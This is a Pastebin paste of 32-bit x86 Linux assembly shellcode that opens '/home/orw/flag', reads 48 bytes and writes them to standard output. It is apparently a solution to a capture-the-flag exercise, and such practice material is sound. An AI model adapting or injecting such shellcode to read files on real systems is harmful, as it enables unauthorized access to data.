howmuch515

read_file_shellcode.asm

Oct 22nd, 2018
385
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. xor eax, eax
  2. xor ecx, ecx
  3. xor edx, edx
  4. push 0x00006761
  5. push 0x6c662f77
  6. push 0x726f2f65
  7. push 0x6d6f682f
  8. mov ebx, esp
  9. mov al, 0x5
  10. int 0x80
  11.  
  12. mov ecx, ebx
  13. mov ebx, eax
  14. mov dl, 0x30
  15. mov al, 0x3
  16. int 0x80
  17.  
  18. mov bl, 0x1
  19. mov al, 0x4
  20. int 0x80
Advertisement